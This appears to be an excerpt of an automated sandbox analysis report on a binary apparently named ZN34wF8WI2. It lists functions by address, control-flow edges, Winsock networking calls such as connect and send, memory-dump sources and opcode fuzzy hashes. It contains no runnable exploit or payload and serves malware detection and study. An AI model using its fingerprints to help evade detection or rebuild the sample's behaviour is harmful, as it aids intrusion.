4dac43-4dac46 1722->1725 1723->1722 1723->1727 1733 4dace7-4dacfe 1724->1733 1734 4dac80-4dac9b 1724->1734 1730 4dac4c-4dac51 1725->1730 1731 4dad04-4dad08 1725->1731 1735 4dad70-4dad78 1726->1735 1727->1693 1730->1731 1738 4dac57-4dac78 1730->1738 1731->1714 1737 4dad0a-4dad28 setsockopt 1731->1737 1733->1731 1734->1733 1739 4dac9d-4dacc1 1734->1739 1740 4dad7a-4dad7f 1735->1740 1741 4dada0-4dadb2 connect 1735->1741 1737->1714 1737->1727 1742 4dacc6-4dacd7 1738->1742 1739->1742 1740->1741 1743 4dad81-4dad99 1740->1743 1744 4dadb3-4dadcf 1741->1744 1742->1727 1751 4dacdd-4dace5 1742->1751 1743->1744 1749 4dae8a-4dae91 1744->1749 1750 4dadd5-4dadd8 1744->1750 1749->1695 1752 4dadda-4daddf 1750->1752 1753 4dade1-4dadf1 1750->1753 1751->1731 1751->1733 1752->1735 1752->1753 1754 4dae0d-4dae12 1753->1754 1755 4dadf3-4dae07 1753->1755 1756 4dae1a-4dae1c call 4daf70 1754->1756 1757 4dae14-4dae17 1754->1757 1755->1754 1760 4daea8-4daead 1755->1760 1761 4dae21-4dae23 1756->1761 1757->1756 1760->1695 1762 4dae25-4dae27 1761->1762 1763 4dae93-4dae9d 1761->1763 1762->1695 1764 4daeaf-4daeb1 call 4ce760 1763->1764 1765 4dae9f-4daea6 call 4ce7c0 1763->1765 1769 4daeb6-4daebe 1764->1769 1765->1769 1770 4daf1a-4daf1f 1769->1770 1771 4daec0-4daedb call 4ce180 1769->1771 1770->1695 1771->1695 1774 4daee1-4daeec 1771->1774 1775 4daeee-4daeff 1774->1775 1776 4daf02-4daf06 1774->1776 1775->1776 1777 4daf0e-4daf15 1776->1777 1778 4daf08-4daf0b 1776->1778 1777->1687 1778->1777
                                  APIs
                                  • socket.WS2_32(FFFFFFFF,?,00000000), ref: 004DAB9B
                                  • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 004DABE3
                                  • setsockopt.WS2_32(?,00000006,00000001,0000001C,00000004), ref: 004DAD20
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1415376531.0000000000411000.00000040.00000001.01000000.00000004.sdmp, Offset: 00410000, based on PE: true
                                  • Associated: 00000005.00000002.1415356958.0000000000410000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.0000000000B58000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415889910.0000000000B5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000B5D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000CE0000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000DF1000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000DF7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000ED6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000EDF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000EED000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416221948.0000000000EEE000.00000080.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416342757.00000000010A2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416378233.00000000010A4000.00000080.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_410000_ZN34wF8WI2.jbxd
                                  Similarity
                                  • API ID: ioctlsocketsetsockoptsocket
                                  • String ID:
                                  • API String ID: 2067140946-0
                                  • Opcode ID: 2a9fd10e7e1d7053f369c1e9f618d4691a3a6b351cdf2394b9538c765782960a
                                  • Instruction ID: 897f8f8675c654efb20f9dd06bc6b097dde9d5bc65c756d8b09f1f82ff029cd5
                                  • Opcode Fuzzy Hash: 2a9fd10e7e1d7053f369c1e9f618d4691a3a6b351cdf2394b9538c765782960a
                                  • Instruction Fuzzy Hash: F9E1CE706003019BEB20CF24C894B6B77A5EF85314F044A2FF9998B391D779D965CB97
                                  Function 00798E90 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 125COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1871 798e90-798eb8 _open 1872 798eba-798ec7 1871->1872 1873 798eff-798f2c call 799f70 1871->1873 1874 798ec9 1872->1874 1875 798ef3-798efa call 798d20 1872->1875 1883 798f39-798f51 call 798ca8 1873->1883 1877 798ecb-798ecd 1874->1877 1878 798ee2-798ef1 1874->1878 1875->1873 1881 798ed3-798ed6 1877->1881 1882 8e99b0-8e99c7 1877->1882 1878->1874 1878->1875 1881->1878 1886 798ed8 1881->1886 1884 8e99ca-8e99f1 1882->1884 1885 8e99c9 1882->1885 1890 798f30-798f37 1883->1890 1891 798f53-798f5e call 798cc0 1883->1891 1889 8e99f9-8e99ff 1884->1889 1886->1878 1893 8e9a19-8e9a3b 1889->1893 1894 8e9a01-8e9a0f 1889->1894 1890->1883 1890->1891 1891->1872 1898 8e9a3d-8e9a44 1893->1898 1899 8e9a46-8e9a5b 1893->1899 1896 8e9a15-8e9a18 1894->1896 1898->1899 1900 8e9a5d-8e9a72 1898->1900 1899->1894 1900->1896
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1415376531.0000000000411000.00000040.00000001.01000000.00000004.sdmp, Offset: 00410000, based on PE: true
                                  • Associated: 00000005.00000002.1415356958.0000000000410000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.0000000000B58000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415889910.0000000000B5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000B5D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000CE0000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000DF1000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000DF7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000ED6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000EDF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000EED000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416221948.0000000000EEE000.00000080.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416342757.00000000010A2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416378233.00000000010A4000.00000080.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_410000_ZN34wF8WI2.jbxd
                                  Similarity
                                  • API ID: _open
                                  • String ID: terminated$@
                                  • API String ID: 4183159743-3016906910
                                  • Opcode ID: 7f2194f10b087f401a74a47be7565f147c5de06e3767948f1cac1b393586503a
                                  • Instruction ID: f779777fb459f403b4b9913e93c13422d32521ffba580b45100b0ddd84cb1eab
                                  • Opcode Fuzzy Hash: 7f2194f10b087f401a74a47be7565f147c5de06e3767948f1cac1b393586503a
                                  • Instruction Fuzzy Hash: 1B4149B09083059ECB50EF79D48476ABAE0FF4A318F008A2DE898D7340EB78D9458B56
                                  Function 0044A150 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1903 44a150-44a159 1904 44a250 1903->1904 1905 44a15f-44a17b 1903->1905 1906 44a181-44a1ce getsockname 1905->1906 1907 44a249-44a24f 1905->1907 1908 44a1f7-44a214 call 44ef30 1906->1908 1909 44a1d0-44a1f5 call 42d090 1906->1909 1907->1904 1908->1907 1914 44a216-44a23b call 42d090 1908->1914 1916 44a240-44a246 call 454f40 1909->1916 1914->1916 1916->1907
                                  APIs
                                  • getsockname.WS2_32(?,?,00000080), ref: 0044A1C7
                                  Strings
                                  • ssloc inet_ntop() failed with errno %d: %s, xrefs: 0044A23B
                                  • getsockname() failed with errno %d: %s, xrefs: 0044A1F0
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1415376531.0000000000411000.00000040.00000001.01000000.00000004.sdmp, Offset: 00410000, based on PE: true
                                  • Associated: 00000005.00000002.1415356958.0000000000410000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.0000000000B58000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415889910.0000000000B5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000B5D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000CE0000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000DF1000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000DF7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000ED6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000EDF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000EED000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416221948.0000000000EEE000.00000080.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416342757.00000000010A2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416378233.00000000010A4000.00000080.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_410000_ZN34wF8WI2.jbxd
                                  Similarity
                                  • API ID: getsockname
                                  • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                  • API String ID: 3358416759-2605427207
                                  • Opcode ID: 3f984b4abd60a77e90c503b469f42af5abc3c9aafe406727fb91cfa5e5f1c230
                                  • Instruction ID: 8adcfc45658d318804e91c0d150873e3b558a40d4b45a36c2b71bf18e712b622
                                  • Opcode Fuzzy Hash: 3f984b4abd60a77e90c503b469f42af5abc3c9aafe406727fb91cfa5e5f1c230
                                  • Instruction Fuzzy Hash: F821F831948280BAF7259B19EC43FE773ACEF81328F000655F99853152FB36698686E6
                                  Function 0042D5E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46networkCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1923 42d5e0-42d5ee 1924 42d652-42d662 WSAStartup 1923->1924 1925 42d5f0-42d604 call 42d690 1923->1925 1926 42d670-42d676 1924->1926 1927 42d664-42d66f 1924->1927 1931 42d606-42d614 1925->1931 1932 42d61b-42d651 call 437620 1925->1932 1926->1925 1930 42d67c-42d68d 1926->1930 1931->1932 1937 42d616 1931->1937 1937->1932
                                  APIs
                                  • WSAStartup.WS2_32(00000202), ref: 0042D65B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1415376531.0000000000411000.00000040.00000001.01000000.00000004.sdmp, Offset: 00410000, based on PE: true
                                  • Associated: 00000005.00000002.1415356958.0000000000410000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.0000000000B58000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415889910.0000000000B5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000B5D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000CE0000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000DF1000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000DF7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000ED6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000EDF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000EED000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416221948.0000000000EEE000.00000080.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416342757.00000000010A2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416378233.00000000010A4000.00000080.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_410000_ZN34wF8WI2.jbxd
                                  Similarity
                                  • API ID: Startup
                                  • String ID: if_nametoindex$iphlpapi.dll
                                  • API String ID: 724789610-3097795196
                                  • Opcode ID: 0f07dbb0ee7818d351a919a5d0ce03ae0fec7a39d06f78de8fa8b2bd4647a1f9
                                  • Instruction ID: f6a47c6d5f13177c1fdbb3f3487dd85e921ac39b9e5a88031d721c7122200ddf
                                  • Opcode Fuzzy Hash: 0f07dbb0ee7818d351a919a5d0ce03ae0fec7a39d06f78de8fa8b2bd4647a1f9
                                  • Instruction Fuzzy Hash: 7B012BD0F4234156FB11AB38BD1736735946B16304FC808A9D888823D2FB6DC589C197
                                  Function 0041F7B0 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 168networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1415376531.0000000000411000.00000040.00000001.01000000.00000004.sdmp, Offset: 00410000, based on PE: true
                                  • Associated: 00000005.00000002.1415356958.0000000000410000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.0000000000B58000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415889910.0000000000B5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000B5D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000CE0000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000DF1000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000DF7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000ED6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000EDF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000EED000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416221948.0000000000EEE000.00000080.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416342757.00000000010A2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416378233.00000000010A4000.00000080.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_410000_ZN34wF8WI2.jbxd
                                  Similarity
                                  • API ID: CloseEvent
                                  • String ID: multi.c
                                  • API String ID: 2624557715-214371023
                                  • Opcode ID: c0ec7547a8d1acdcdf94f5163d7addb1b1271dcc2e4b22287fdd62a61a1a6446
                                  • Instruction ID: ed3e8bfcaf3e99f243055226172b5601378cb2a2df32588d90a38dc82a4fd879
                                  • Opcode Fuzzy Hash: c0ec7547a8d1acdcdf94f5163d7addb1b1271dcc2e4b22287fdd62a61a1a6446
                                  • Instruction Fuzzy Hash: 7951C5B59043005BEB10BA21AC41BE736A46F5431CF08453AE98D9A253FB3DA54EC79B
                                  Function 004178B0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1415376531.0000000000411000.00000040.00000001.01000000.00000004.sdmp, Offset: 00410000, based on PE: true
                                  • Associated: 00000005.00000002.1415356958.0000000000410000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.0000000000B58000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415889910.0000000000B5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000B5D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000CE0000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000DF1000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000DF7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000ED6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000EDF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000EED000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416221948.0000000000EEE000.00000080.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416342757.00000000010A2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416378233.00000000010A4000.00000080.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_410000_ZN34wF8WI2.jbxd
                                  Similarity
                                  • API ID: closesocket
                                  • String ID: FD %s:%d sclose(%d)
                                  • API String ID: 2781271927-3116021458
                                  • Opcode ID: 706703c43da841dcfe3fdb938cd4c52ab7d7e8a36d0d0019244d4c6aff3c25f6
                                  • Instruction ID: 8fae34c6b039f6703778228869e651ca655ad3185cdd977ad21e5805bd091aa5
                                  • Opcode Fuzzy Hash: 706703c43da841dcfe3fdb938cd4c52ab7d7e8a36d0d0019244d4c6aff3c25f6
                                  • Instruction Fuzzy Hash: F9D05E32A092216B85306959AC48C9B7BA8DEC6F60B090CA9F94467305E6349C4183E6
                                  Function 004DB060 Relevance: 3.0, APIs: 2, Instructions: 48networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,004DB29E,?,00000000,?,?), ref: 004DB0BA
                                  • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,004C3C41,00000000), ref: 004DB0C1
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1415376531.0000000000411000.00000040.00000001.01000000.00000004.sdmp, Offset: 00410000, based on PE: true
                                  • Associated: 00000005.00000002.1415356958.0000000000410000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.0000000000B58000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415889910.0000000000B5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000B5D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000CE0000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000DF1000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000DF7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000ED6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000EDF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000EED000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416221948.0000000000EEE000.00000080.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416342757.00000000010A2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416378233.00000000010A4000.00000080.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_410000_ZN34wF8WI2.jbxd
                                  Similarity
                                  • API ID: ErrorLastconnect
                                  • String ID:
                                  • API String ID: 374722065-0
                                  • Opcode ID: 4a07cd8d4e6953fc7e5dca96ee3601b5a257217f5d35f2a33268c77675d328ca
                                  • Instruction ID: 80a321a6987ec9a0477c41c5e66d5f794d5cff064fef365569db83d2d880e5a1
                                  • Opcode Fuzzy Hash: 4a07cd8d4e6953fc7e5dca96ee3601b5a257217f5d35f2a33268c77675d328ca
                                  • Instruction Fuzzy Hash: E501F936304200DBCA215A248854B67B3A5FF4C364F054B5BE578933D0D72AED004796
                                  Function 004C4950 Relevance: 1.7, APIs: 1, Instructions: 170networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • gethostname.WS2_32(00000000,00000040), ref: 004C4AA5
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1415376531.0000000000411000.00000040.00000001.01000000.00000004.sdmp, Offset: 00410000, based on PE: true
                                  • Associated: 00000005.00000002.1415356958.0000000000410000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.0000000000B58000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415889910.0000000000B5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000B5D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000CE0000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000DF1000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000DF7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000ED6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000EDF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000EED000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416221948.0000000000EEE000.00000080.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416342757.00000000010A2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416378233.00000000010A4000.00000080.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_410000_ZN34wF8WI2.jbxd
                                  Similarity
                                  • API ID: gethostname
                                  • String ID:
                                  • API String ID: 144339138-0
                                  • Opcode ID: de90da787216802b9988f08679aaf86464d4b10780147239016afb4f5b883a5b
                                  • Instruction ID: 1f207bc0dcbba8abb511848a082aad3478840cc60fbaea32810b07d3104c7300
                                  • Opcode Fuzzy Hash: de90da787216802b9988f08679aaf86464d4b10780147239016afb4f5b883a5b
                                  • Instruction Fuzzy Hash: 1B51C3B86047019BE7B09B25DE59B2376D4AF81319F14083EE98A867D1F77DEC44C70A
                                  Function 004DAF70 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                  Download Yara Rule
                                  APIs
                                  • getsockname.WS2_32(?,?,00000080), ref: 004DAFD0
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1415376531.0000000000411000.00000040.00000001.01000000.00000004.sdmp, Offset: 00410000, based on PE: true
                                  • Associated: 00000005.00000002.1415356958.0000000000410000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.0000000000B58000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415889910.0000000000B5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000B5D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000CE0000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000DF1000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000DF7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000ED6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000EDF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000EED000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416221948.0000000000EEE000.00000080.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416342757.00000000010A2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416378233.00000000010A4000.00000080.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_410000_ZN34wF8WI2.jbxd
                                  Similarity
                                  • API ID: getsockname
                                  • String ID:
                                  • API String ID: 3358416759-0
                                  • Opcode ID: 4ed6c873142418b1c762ec7cb65d5bb419db187170a439d93c0dff0a7770d0d5
                                  • Instruction ID: 03ae9016a018365aed001b04820135a889b11364eb9943af6657d7a42b698af2
                                  • Opcode Fuzzy Hash: 4ed6c873142418b1c762ec7cb65d5bb419db187170a439d93c0dff0a7770d0d5
                                  • Instruction Fuzzy Hash: 82119670908785D5EB268F18D4027E6B3F4EFD0328F10961EE5D942250F7365AC68BC2
                                  Function 004DA920 Relevance: 1.5, APIs: 1, Instructions: 44networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • send.WS2_32(?,?,?,00000000,00000000,?), ref: 004DA97E
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1415376531.0000000000411000.00000040.00000001.01000000.00000004.sdmp, Offset: 00410000, based on PE: true
                                  • Associated: 00000005.00000002.1415356958.0000000000410000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.0000000000B58000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415889910.0000000000B5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000B5D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000CE0000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000DF1000.00000040.00000001.01000000.00000004.sdmpDownload File
